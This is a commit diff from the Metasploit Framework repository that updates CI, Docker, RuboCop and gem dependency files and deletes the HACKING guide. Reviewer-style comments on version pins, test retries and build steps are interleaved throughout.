Merge pull request #1 from bwatters-r7/prep-8509

bypassuac_injection_winsxs updates and documents
bug/bundler_fix
Ernesto Fernandez 2017-10-11 11:43:57 +02:00 committed by GitHub
commit 32eb1e9fe6
3849 changed files with 31213 additions and 14807 deletions

@ -90,7 +90,7 @@ data/java
# Avoid checking in Meterpreter libs that are built from # Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality, # private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download # check out Metasploit Pro: https://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for # Avoid checking in metakitty, the source for

.gitignore vendored

@ -78,7 +78,7 @@ data/java
# Avoid checking in Meterpreter libs that are built from # Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality, # private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download # check out Metasploit Pro: https://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for # Avoid checking in metakitty, the source for
@ -91,3 +91,4 @@ docker-compose.local*
# Ignore python bytecode # Ignore python bytecode
*.pyc *.pyc
rspec.failures

@ -8,18 +8,57 @@
# inherit_from: .rubocop_todo.yml # inherit_from: .rubocop_todo.yml
AllCops:
TargetRubyVersion: 2.2
Metrics/ClassLength: Metrics/ClassLength:
Description: 'Most Metasploit modules are quite large. This is ok.' Description: 'Most Metasploit modules are quite large. This is ok.'
Enabled: true Enabled: true
Exclude: Exclude:
- 'modules/**/*' - 'modules/**/*'
Metrics/AbcSize:
Enabled: false
Description: 'This is often a red-herring'
Metrics/CyclomaticComplexity:
Enabled: false
Description: 'This is often a red-herring'
Metrics/PerceivedComplexity:
Enabled: false
Description: 'This is often a red-herring'
Style/FrozenStringLiteralComment:
Enabled: false
Description: 'We cannot support this yet without a lot of things breaking'
Style/RedundantReturn:
Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
Enabled: false
Style/Documentation: Style/Documentation:
Enabled: true Enabled: true
Description: 'Most Metasploit modules do not have class documentation.' Description: 'Most Metasploit modules do not have class documentation.'
Exclude: Exclude:
- 'modules/**/*' - 'modules/**/*'
Layout/IndentHeredoc:
Enabled: false
Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
Style/GuardClause:
Enabled: false
Description: 'This often introduces bugs in tested code'
Style/NegatedIf:
Enabled: false
Description: 'This often introduces bugs in tested code'
Style/ConditionalAssignment:
Enabled: false
Description: 'This is confusing for folks coming from other languages'
Style/Encoding: Style/Encoding:
Enabled: true Enabled: true
Description: 'We prefer binary to UTF-8.' Description: 'We prefer binary to UTF-8.'
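Review bot: the key order inside the new cop entries is inconsistent within this hunk: Metrics/AbcSize, Metrics/CyclomaticComplexity, Metrics/PerceivedComplexity and Style/FrozenStringLiteralComment put Enabled before Description, while Style/RedundantReturn and the pre-existing entries put Description first; pick one order for the file. The Layout/IndentHeredoc description ('remove in 2018') is a deadline with no owner; tie it to the `TargetRubyVersion: 2.2` line it actually depends on, e.g. 'Disabled while TargetRubyVersion is 2.2', so whoever raises the minimum Ruby knows to re-enable it.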
@ -53,7 +92,7 @@ Style/NumericLiterals:
Enabled: false Enabled: false
Description: 'This often hurts readability for exploit-ish code.' Description: 'This often hurts readability for exploit-ish code.'
Style/SpaceInsideBrackets: Layout/SpaceInsideBrackets:
Enabled: false Enabled: false
Description: 'Until module template are final, most modules will fail this.' Description: 'Until module template are final, most modules will fail this.'
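Review bot: the rename to Layout/SpaceInsideBrackets assumes a RuboCop release that has the Layout department (split out of Style in 0.49); this diff does not show rubocop pinned anywhere, so a minimum version should be pinned or the config fails to load on older installs. While touching the entry, the description has a grammar slip: 'Until module template are final' should read 'Until module templates are final'.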

@ -1 +1 @@
2.4.1 2.4.2

@ -12,20 +12,24 @@ addons:
language: ruby language: ruby
rvm: rvm:
- '2.2' - '2.2'
- '2.3.4' - '2.3.5'
- '2.4.1' - '2.4.2'
env: env:
# TODO: restore these tests when the code passes them! - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true' - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
- CMD='bundle exec rake spec SPEC_OPTS="--tag content"'
- CMD='bundle exec rake spec SPEC_OPTS="--tag ~content"'
matrix: matrix:
fast_finish: true fast_finish: true
jobs:
# build docker image
include: include:
- rvm: ruby-head - env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true"
env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" # we do not need any setup
before_install: skip
install: skip
before_script: skip
before_install: before_install:
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc" - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
- rake --version - rake --version
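Review bot: switching both spec jobs to `rake rspec-rerun:spec` means a spec that fails and then passes on retry turns the build green, so intermittently failing tests stop being visible in CI. Make the retry count explicit and surface when a retry was needed (rspec.failures, which the .gitignore hunk now ignores, is the artifact to print at the end of the job), otherwise flakiness accumulates silently. Dropping the TODO about the cucumber jobs is consistent with cucumber-rails leaving the Gemfile in this same commit.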
@ -44,7 +48,8 @@ before_script:
- git diff --exit-code db/schema.rb - git diff --exit-code db/schema.rb
script: script:
- echo "${CMD}" - echo "${CMD}"
- bash -c "${CMD}" # we need travis_wait because the Docker build job can take longer than 10 minutes
- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
notifications: notifications:
irc: "irc.freenode.org#msfnotify" irc: "irc.freenode.org#msfnotify"
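Review bot: the two branches of the new script line invoke CMD differently: the Docker branch passes it as one quoted word to `travis_wait 40 "${CMD}"`, the other runs `bash -c "${CMD}"`. This only works if travis_wait word-splits its arguments before executing them; confirm that against the Travis helper, because if it does not, the Docker job tries to run a program whose name is the entire command string. A small shell function that performs the `bash -c` and is handed to travis_wait would make both branches take the same path.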

@ -2,7 +2,7 @@
--exclude samples/ --exclude samples/
--exclude \.ut\.rb/ --exclude \.ut\.rb/
--exclude \.ts\.rb/ --exclude \.ts\.rb/
--files CONTRIBUTING.md,COPYING,HACKING,LICENSE --files CONTRIBUTING.md,COPYING,LICENSE
app/**/*.rb app/**/*.rb
lib/msf/**/*.rb lib/msf/**/*.rb
lib/metasploit/**/*.rb lib/metasploit/**/*.rb

@ -119,4 +119,4 @@ already way ahead of the curve, so keep it up!
[YARD]:http://yardoc.org [YARD]:http://yardoc.org
[Issues]:https://github.com/rapid7/metasploit-framework/issues [Issues]:https://github.com/rapid7/metasploit-framework/issues
[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4 [Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers [metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers

@ -1,4 +1,4 @@
FROM ruby:2.4.1-alpine FROM ruby:2.4.2-alpine
MAINTAINER Rapid7 MAINTAINER Rapid7
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage" ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@ -24,7 +24,6 @@ RUN apk update && \
bison \ bison \
build-base \ build-base \
ruby-dev \ ruby-dev \
libffi-dev\
openssl-dev \ openssl-dev \
readline-dev \ readline-dev \
sqlite-dev \ sqlite-dev \
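Review bot: dropping libffi-dev from the build-deps needs a check against the Gemfile.lock in this same commit, which still resolves ffi (1.9.18) and newly adds rbnacl (4.0.2) with an ffi dependency plus rbnacl-libsodium. Without the system headers the ffi gem compiles its bundled libffi instead, which lengthens the image build (the Travis change already needs `travis_wait 40` for this image); either keep libffi-dev or confirm the image builds cleanly without it.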
@ -35,15 +34,14 @@ RUN apk update && \
yaml-dev \ yaml-dev \
zlib-dev \ zlib-dev \
ncurses-dev \ ncurses-dev \
git \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& gem update --system \
&& gem install bundler \
&& bundle install --system $BUNDLER_ARGS \ && bundle install --system $BUNDLER_ARGS \
&& apk del .ruby-builddeps \ && apk del .ruby-builddeps \
&& rm -rf /var/cache/apk/* && rm -rf /var/cache/apk/*
# fix for robots gem not readable (known bug)
# https://github.com/rapid7/metasploit-framework/issues/6068
RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb
RUN adduser -g msfconsole -D $MSF_USER RUN adduser -g msfconsole -D $MSF_USER
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby) RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
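Review bot: removing `gem update --system` and `gem install bundler` leaves the image on whatever bundler ships in ruby:2.4.2-alpine, while the Gemfile.lock in this commit ends with `BUNDLED WITH 1.15.4`. An older bundler prints a warning and may rewrite the lockfile during `bundle install --system`; pin it explicitly (`gem install bundler -v 1.15.4`) so the image and the lockfile agree. Dropping git is consistent with the lockfile (only PATH and rubygems.org sources), and removing the robots chmod workaround matches robots leaving the lockfile.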

Gemfile

@ -18,9 +18,9 @@ group :development do
gem 'pry' gem 'pry'
# module documentation # module documentation
gem 'octokit' gem 'octokit'
# metasploit-aggregator as a framework only option for now
# Metasploit::Aggregator external session proxy # Metasploit::Aggregator external session proxy
gem 'metasploit-aggregator' # Disabled for now for crypttlv updates
# gem 'metasploit-aggregator'
end end
group :development, :test do group :development, :test do
@ -33,14 +33,10 @@ group :development, :test do
# Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the # Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the
# environment is development # environment is development
gem 'rspec-rails' gem 'rspec-rails'
gem 'rspec-rerun'
end end
group :test do group :test do
# cucumber extension for testing command line applications, like msfconsole
gem 'aruba'
# cucumber + automatic database cleaning with database_cleaner
gem 'cucumber-rails', :require => false
gem 'shoulda-matchers'
# Manipulate Time.now in specs # Manipulate Time.now in specs
gem 'timecop' gem 'timecop'
end end
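Review bot: shoulda-matchers is removed from the test group without a replacement; any spec that uses its matchers (validate_presence_of, belong_to and friends) will fail to load, so the spec tree should be grepped for them before this merges. Removing aruba and cucumber-rails is consistent with the Travis hunk that drops the cucumber jobs.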

@ -1,13 +1,15 @@
PATH PATH
remote: . remote: .
specs: specs:
metasploit-framework (4.14.25) metasploit-framework (4.16.11)
actionpack (~> 4.2.6) actionpack (~> 4.2.6)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
backports backports
bcrypt bcrypt
bcrypt_pbkdf
bit-struct bit-struct
dnsruby
filesize filesize
jsobfu jsobfu
json json
@ -15,9 +17,9 @@ PATH
metasploit-concern metasploit-concern
metasploit-credential metasploit-credential
metasploit-model metasploit-model
metasploit-payloads (= 1.2.29) metasploit-payloads (= 1.3.9)
metasploit_data_models metasploit_data_models
metasploit_payloads-mettle (= 0.1.9) metasploit_payloads-mettle (= 0.2.2)
msgpack msgpack
nessus_rest nessus_rest
net-ssh net-ssh
@ -30,9 +32,12 @@ PATH
packetfu packetfu
patch_finder patch_finder
pcaprub pcaprub
pg pdf-reader
pg (= 0.20.0)
railties railties
rb-readline rb-readline
rbnacl (< 5.0.0)
rbnacl-libsodium
recog recog
redcarpet redcarpet
rex-arch rex-arch
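Review bot: `pg (= 0.20.0)` is an exact pin and `rbnacl (< 5.0.0)` an upper bound, both coming from the gemspec this lockfile reflects (the gemspec itself is not in the diff shown); an exact pin on a native-extension gem blocks security updates, so each bound should carry a comment with the reason and an issue to lift it.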
@ -44,7 +49,7 @@ PATH
rex-mime rex-mime
rex-nop rex-nop
rex-ole rex-ole
rex-powershell rex-powershell (< 0.1.73)
rex-random_identifier rex-random_identifier
rex-registry rex-registry
rex-rop_builder rex-rop_builder
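Review bot: `rex-powershell (< 0.1.73)` caps the gem at the already-locked 0.1.72, which reads like a workaround for a breaking change in 0.1.73; the reason belongs in a gemspec comment and a tracking issue, otherwise the cap will outlive whatever it works around.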
@ -53,7 +58,6 @@ PATH
rex-struct2 rex-struct2
rex-text rex-text
rex-zip rex-zip
robots
ruby_smb ruby_smb
rubyntlm rubyntlm
rubyzip rubyzip
@ -62,141 +66,94 @@ PATH
tzinfo tzinfo
tzinfo-data tzinfo-data
windows_error windows_error
xdr
xmlrpc xmlrpc
GEM GEM
remote: https://rubygems.org/ remote: https://rubygems.org/
specs: specs:
actionpack (4.2.8) Ascii85 (1.0.2)
actionview (= 4.2.8) actionpack (4.2.10)
activesupport (= 4.2.8) actionview (= 4.2.10)
activesupport (= 4.2.10)
rack (~> 1.6) rack (~> 1.6)
rack-test (~> 0.6.2) rack-test (~> 0.6.2)
rails-dom-testing (~> 1.0, >= 1.0.5) rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.2) rails-html-sanitizer (~> 1.0, >= 1.0.2)
actionview (4.2.8) actionview (4.2.10)
activesupport (= 4.2.8) activesupport (= 4.2.10)
builder (~> 3.1) builder (~> 3.1)
erubis (~> 2.7.0) erubis (~> 2.7.0)
rails-dom-testing (~> 1.0, >= 1.0.5) rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.3) rails-html-sanitizer (~> 1.0, >= 1.0.3)
activemodel (4.2.8) activemodel (4.2.10)
activesupport (= 4.2.8) activesupport (= 4.2.10)
builder (~> 3.1) builder (~> 3.1)
activerecord (4.2.8) activerecord (4.2.10)
activemodel (= 4.2.8) activemodel (= 4.2.10)
activesupport (= 4.2.8) activesupport (= 4.2.10)
arel (~> 6.0) arel (~> 6.0)
activesupport (4.2.8) activesupport (4.2.10)
i18n (~> 0.7) i18n (~> 0.7)
minitest (~> 5.1) minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4) thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1) tzinfo (~> 1.1)
addressable (2.5.1) addressable (2.5.2)
public_suffix (~> 2.0, >= 2.0.2) public_suffix (>= 2.0.2, < 4.0)
afm (0.2.2)
arel (6.0.4) arel (6.0.4)
arel-helpers (2.4.0) arel-helpers (2.4.0)
activerecord (>= 3.1.0, < 6) activerecord (>= 3.1.0, < 6)
aruba (0.14.2)
childprocess (~> 0.5.6)
contracts (~> 0.9)
cucumber (>= 1.3.19)
ffi (~> 1.9.10)
rspec-expectations (>= 2.99)
thor (~> 0.19)
backports (3.8.0) backports (3.8.0)
bcrypt (3.1.11) bcrypt (3.1.11)
bindata (2.4.0) bcrypt_pbkdf (1.0.0)
bindata (2.4.1)
bit-struct (0.16) bit-struct (0.16)
builder (3.2.3) builder (3.2.3)
capybara (2.14.0) coderay (1.1.2)
addressable crass (1.0.2)
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
rack (>= 1.0.0)
rack-test (>= 0.5.4)
xpath (~> 2.0)
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.1)
contracts (0.16.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
cucumber-wire (~> 0.0.1)
diff-lcs (>= 1.1.3)
gherkin (~> 4.0)
multi_json (>= 1.7.5, < 2.0)
multi_test (>= 0.1.2)
cucumber-core (1.5.0)
gherkin (~> 4.0)
cucumber-rails (1.5.0)
capybara (>= 1.1.2, < 3)
cucumber (>= 1.3.8, < 4)
mime-types (>= 1.17, < 4)
nokogiri (~> 1.5)
railties (>= 4, < 5.2)
cucumber-wire (0.0.1)
diff-lcs (1.3) diff-lcs (1.3)
dnsruby (1.60.2)
docile (1.1.5) docile (1.1.5)
erubis (2.7.0) erubis (2.7.0)
factory_girl (4.8.0) factory_girl (4.8.1)
activesupport (>= 3.0.0) activesupport (>= 3.0.0)
factory_girl_rails (4.8.0) factory_girl_rails (4.8.0)
factory_girl (~> 4.8.0) factory_girl (~> 4.8.0)
railties (>= 3.0.0) railties (>= 3.0.0)
faraday (0.12.1) faraday (0.13.1)
multipart-post (>= 1.2, < 3) multipart-post (>= 1.2, < 3)
ffi (1.9.18) ffi (1.9.18)
filesize (0.1.1) filesize (0.1.1)
fivemat (1.3.4) fivemat (1.3.5)
gherkin (4.1.3) hashery (2.1.2)
google-protobuf (3.3.0) i18n (0.8.6)
googleauth (0.5.1)
faraday (~> 0.9)
jwt (~> 1.4)
logging (~> 2.0)
memoist (~> 0.12)
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.3.4)
google-protobuf (~> 3.1)
googleauth (~> 0.5.1)
i18n (0.8.4)
jsobfu (0.4.2) jsobfu (0.4.2)
rkelly-remix rkelly-remix
json (2.1.0) json (2.1.0)
jwt (1.5.6) loofah (2.1.1)
little-plugger (1.1.4) crass (~> 1.0.2)
logging (2.2.2)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.0.3)
nokogiri (>= 1.5.9) nokogiri (>= 1.5.9)
memoist (0.15.0)
metasm (1.0.3) metasm (1.0.3)
metasploit-aggregator (0.2.1) metasploit-concern (2.0.5)
grpc
rex-arch
metasploit-concern (2.0.4)
activemodel (~> 4.2.6) activemodel (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
railties (~> 4.2.6) railties (~> 4.2.6)
metasploit-credential (2.0.9) metasploit-credential (2.0.12)
metasploit-concern metasploit-concern
metasploit-model metasploit-model
metasploit_data_models metasploit_data_models
pg pg
railties railties
rex-socket
rubyntlm rubyntlm
rubyzip rubyzip
metasploit-model (2.0.4) metasploit-model (2.0.4)
activemodel (~> 4.2.6) activemodel (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
railties (~> 4.2.6) railties (~> 4.2.6)
metasploit-payloads (1.2.29) metasploit-payloads (1.3.9)
metasploit_data_models (2.0.14) metasploit_data_models (2.0.15)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
arel-helpers arel-helpers
@ -206,43 +163,42 @@ GEM
postgres_ext postgres_ext
railties (~> 4.2.6) railties (~> 4.2.6)
recog (~> 2.0) recog (~> 2.0)
metasploit_payloads-mettle (0.1.9) metasploit_payloads-mettle (0.2.2)
method_source (0.8.2) method_source (0.9.0)
mime-types (3.1) mini_portile2 (2.3.0)
mime-types-data (~> 3.2015) minitest (5.10.3)
mime-types-data (3.2016.0521)
mini_portile2 (2.1.0)
minitest (5.10.2)
msgpack (1.1.0) msgpack (1.1.0)
multi_json (1.12.1)
multi_test (0.1.2)
multipart-post (2.0.0) multipart-post (2.0.0)
nessus_rest (0.1.6) nessus_rest (0.1.6)
net-ssh (4.1.0) net-ssh (4.2.0)
network_interface (0.0.1) network_interface (0.0.2)
nexpose (6.0.0) nexpose (7.1.1)
nokogiri (1.7.2) nokogiri (1.8.1)
mini_portile2 (~> 2.1.0) mini_portile2 (~> 2.3.0)
octokit (4.7.0) octokit (4.7.0)
sawyer (~> 0.8.0, >= 0.5.3) sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1) openssl-ccm (1.2.1)
openvas-omp (0.0.4) openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13) packetfu (1.1.13)
pcaprub pcaprub
patch_finder (1.0.2) patch_finder (1.0.2)
pcaprub (0.12.4) pcaprub (0.12.4)
pdf-reader (2.0.0)
Ascii85 (~> 1.0.0)
afm (~> 0.2.1)
hashery (~> 2.0)
ruby-rc4
ttfunk
pg (0.20.0) pg (0.20.0)
pg_array_parser (0.0.9) pg_array_parser (0.0.9)
postgres_ext (3.0.0) postgres_ext (3.0.0)
activerecord (>= 4.0.0) activerecord (>= 4.0.0)
arel (>= 4.0.1) arel (>= 4.0.1)
pg_array_parser (~> 0.0.9) pg_array_parser (~> 0.0.9)
pry (0.10.4) pry (0.11.1)
coderay (~> 1.1.0) coderay (~> 1.1.0)
method_source (~> 0.8.1) method_source (~> 0.9.0)
slop (~> 3.4) public_suffix (3.0.0)
public_suffix (2.0.5)
rack (1.6.8) rack (1.6.8)
rack-test (0.6.3) rack-test (0.6.3)
rack (>= 1.0) rack (>= 1.0)
@ -254,25 +210,29 @@ GEM
rails-deprecated_sanitizer (>= 1.0.1) rails-deprecated_sanitizer (>= 1.0.1)
rails-html-sanitizer (1.0.3) rails-html-sanitizer (1.0.3)
loofah (~> 2.0) loofah (~> 2.0)
railties (4.2.8) railties (4.2.10)
actionpack (= 4.2.8) actionpack (= 4.2.10)
activesupport (= 4.2.8) activesupport (= 4.2.10)
rake (>= 0.8.7) rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0) thor (>= 0.18.1, < 2.0)
rake (12.0.0) rake (12.1.0)
rb-readline (0.5.4) rb-readline (0.5.5)
recog (2.1.8) rbnacl (4.0.2)
ffi
rbnacl-libsodium (1.0.13)
rbnacl (>= 3.0.1)
recog (2.1.15)
nokogiri nokogiri
redcarpet (3.4.0) redcarpet (3.4.0)
rex-arch (0.1.8) rex-arch (0.1.11)
rex-text rex-text
rex-bin_tools (0.1.3) rex-bin_tools (0.1.4)
metasm metasm
rex-arch rex-arch
rex-core rex-core
rex-struct2 rex-struct2
rex-text rex-text
rex-core (0.1.10) rex-core (0.1.12)
rex-encoder (0.1.4) rex-encoder (0.1.4)
metasm metasm
rex-arch rex-arch
@ -293,16 +253,17 @@ GEM
rex-powershell (0.1.72) rex-powershell (0.1.72)
rex-random_identifier rex-random_identifier
rex-text rex-text
rex-random_identifier (0.1.2) rex-random_identifier (0.1.4)
rex-text rex-text
rex-registry (0.1.3) rex-registry (0.1.3)
rex-rop_builder (0.1.3) rex-rop_builder (0.1.3)
metasm metasm
rex-core rex-core
rex-text rex-text
rex-socket (0.1.6) rex-socket (0.1.8)
rex-core
rex-sslscan (0.1.5)
rex-core rex-core
rex-sslscan (0.1.4)
rex-socket rex-socket
rex-text rex-text
rex-struct2 (0.1.2) rex-struct2 (0.1.2)
@ -310,7 +271,10 @@ GEM
rex-zip (0.1.3) rex-zip (0.1.3)
rex-text rex-text
rkelly-remix (0.0.7) rkelly-remix (0.0.7)
robots (0.10.1) rspec (3.6.0)
rspec-core (~> 3.6.0)
rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0)
rspec-core (3.6.0) rspec-core (3.6.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.6.0)
rspec-expectations (3.6.0) rspec-expectations (3.6.0)
@ -319,7 +283,7 @@ GEM
rspec-mocks (3.6.0) rspec-mocks (3.6.0)
diff-lcs (>= 1.2.0, < 2.0) diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.6.0)
rspec-rails (3.6.0) rspec-rails (3.6.1)
actionpack (>= 3.0) actionpack (>= 3.0)
activesupport (>= 3.0) activesupport (>= 3.0)
railties (>= 3.0) railties (>= 3.0)
@ -327,7 +291,10 @@ GEM
rspec-expectations (~> 3.6.0) rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0) rspec-mocks (~> 3.6.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.6.0)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.6.0) rspec-support (3.6.0)
ruby-rc4 (0.1.5)
ruby_smb (0.0.18) ruby_smb (0.0.18)
bindata bindata
rubyntlm rubyntlm
@ -337,53 +304,44 @@ GEM
sawyer (0.8.1) sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6) addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0) faraday (~> 0.8, < 1.0)
shoulda-matchers (3.1.1) simplecov (0.15.1)
activesupport (>= 4.0.0)
signet (0.7.3)
addressable (~> 2.3)
faraday (~> 0.9)
jwt (~> 1.5)
multi_json (~> 1.10)
simplecov (0.14.1)
docile (~> 1.1.0) docile (~> 1.1.0)
json (>= 1.8, < 3) json (>= 1.8, < 3)
simplecov-html (~> 0.10.0) simplecov-html (~> 0.10.0)
simplecov-html (0.10.1) simplecov-html (0.10.2)
slop (3.6.0)
sqlite3 (1.3.13) sqlite3 (1.3.13)
sshkey (1.9.0) sshkey (1.9.0)
thor (0.19.4) thor (0.20.0)
thread_safe (0.3.6) thread_safe (0.3.6)
timecop (0.8.1) timecop (0.9.1)
ttfunk (1.5.1)
tzinfo (1.2.3) tzinfo (1.2.3)
thread_safe (~> 0.1) thread_safe (~> 0.1)
tzinfo-data (1.2017.2) tzinfo-data (1.2017.2)
tzinfo (>= 1.0.0) tzinfo (>= 1.0.0)
windows_error (0.1.2) windows_error (0.1.2)
xdr (2.0.0)
activemodel (>= 4.2.7)
activesupport (>= 4.2.7)
xmlrpc (0.3.0) xmlrpc (0.3.0)
xpath (2.1.0)
nokogiri (~> 1.3)
yard (0.9.9) yard (0.9.9)
PLATFORMS PLATFORMS
ruby ruby
DEPENDENCIES DEPENDENCIES
aruba
cucumber-rails
factory_girl_rails factory_girl_rails
fivemat fivemat
metasploit-aggregator
metasploit-framework! metasploit-framework!
octokit octokit
pry pry
rake rake
redcarpet redcarpet
rspec-rails rspec-rails
shoulda-matchers rspec-rerun
simplecov simplecov
timecop timecop
yard yard
BUNDLED WITH BUNDLED WITH
1.15.1 1.15.4

HACKING

@ -1,38 +0,0 @@
HACKING
=======
(Last updated: 2014-03-04)
This document almost entirely deprecated by:
CONTRIBUTING.md
in the same directory as this file, and to a lesser extent:
The Metasploit Development Environment
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
Common Coding Mistakes
https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
The Ruby Style Guide
https://github.com/bbatsov/ruby-style-guide
Ruby 1.9: What to Expect
http://slideshow.rubyforge.org/ruby19.html
You can use the the "./tools/msftidy.rb" script against your new and
changed modules to do some rudimentary checking for various style and
syntax violations.
Licensing for Your New Content
==============================
By submitting code contributions to the Metasploit Project it is
assumed that you are offering your code under the Metasploit License
or similar 3-clause BSD-compatible license. MIT and Ruby Licenses
are also fine. We specifically cannot include GPL code. LGPL code
is accepted on a case by case basis for libraries only and is never
accepted for modules.
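Review bot: deleting HACKING also deletes the 'Licensing for Your New Content' section (BSD/MIT/Ruby accepted, GPL excluded, LGPL case by case for libraries only). The file's own header points to CONTRIBUTING.md as its replacement, so confirm CONTRIBUTING.md states that licensing policy before this merges; the .yardopts hunk removing HACKING from --files is consistent with the deletion.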

@ -1,71 +1,62 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh This file is auto-generated by tools/dev/update_gem_licenses.sh
actionpack, 4.2.8, MIT Ascii85, 1.0.2, MIT
actionview, 4.2.8, MIT actionpack, 4.2.9, MIT
activemodel, 4.2.8, MIT actionview, 4.2.9, MIT
activerecord, 4.2.8, MIT activemodel, 4.2.9, MIT
activesupport, 4.2.8, MIT activerecord, 4.2.9, MIT
activesupport, 4.2.9, MIT
addressable, 2.5.1, "Apache 2.0" addressable, 2.5.1, "Apache 2.0"
afm, 0.2.2, MIT
arel, 6.0.4, MIT arel, 6.0.4, MIT
arel-helpers, 2.4.0, unknown arel-helpers, 2.4.0, unknown
aruba, 0.14.2, MIT
backports, 3.8.0, MIT backports, 3.8.0, MIT
bcrypt, 3.1.11, MIT bcrypt, 3.1.11, MIT
bindata, 2.4.0, ruby bindata, 2.4.0, ruby
bit-struct, 0.16, ruby bit-struct, 0.16, ruby
builder, 3.2.3, MIT builder, 3.2.3, MIT
bundler, 1.15.0, MIT bundler, 1.15.1, MIT
capybara, 2.14.0, MIT
childprocess, 0.5.9, MIT
coderay, 1.1.1, MIT coderay, 1.1.1, MIT
contracts, 0.16.0, "Simplified BSD"
cucumber, 2.4.0, MIT
cucumber-core, 1.5.0, MIT
cucumber-rails, 1.5.0, MIT
cucumber-wire, 0.0.1, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+" diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.60.1, "Apache 2.0"
docile, 1.1.5, MIT docile, 1.1.5, MIT
erubis, 2.7.0, MIT erubis, 2.7.0, MIT
factory_girl, 4.8.0, MIT factory_girl, 4.8.0, MIT
factory_girl_rails, 4.8.0, MIT factory_girl_rails, 4.8.0, MIT
faraday, 0.12.1, MIT faraday, 0.12.1, MIT
ffi, 1.9.18, "New BSD"
filesize, 0.1.1, MIT filesize, 0.1.1, MIT
fivemat, 1.3.3, MIT fivemat, 1.3.5, MIT
gherkin, 4.1.3, MIT
google-protobuf, 3.3.0, "New BSD" google-protobuf, 3.3.0, "New BSD"
googleauth, 0.5.1, "Apache 2.0" googleauth, 0.5.1, "Apache 2.0"
grpc, 1.3.4, "New BSD" grpc, 1.4.1, "New BSD"
i18n, 0.8.1, MIT hashery, 2.1.2, "Simplified BSD"
i18n, 0.8.6, MIT
jsobfu, 0.4.2, "New BSD" jsobfu, 0.4.2, "New BSD"
json, 2.1.0, ruby json, 2.1.0, ruby
jwt, 1.5.6, MIT jwt, 1.5.6, MIT
little-plugger, 1.1.4, MIT little-plugger, 1.1.4, MIT
logging, 2.2.2, MIT logging, 2.2.2, MIT
loofah, 2.0.3, MIT loofah, 2.0.3, MIT
memoist, 0.15.0, MIT memoist, 0.16.0, MIT
metasm, 1.0.3, LGPL metasm, 1.0.3, LGPL
metasploit-aggregator, 0.2.1, "New BSD" metasploit-aggregator, 0.2.1, "New BSD"
metasploit-concern, 2.0.4, "New BSD" metasploit-concern, 2.0.5, "New BSD"
metasploit-credential, 2.0.9, "New BSD" metasploit-credential, 2.0.10, "New BSD"
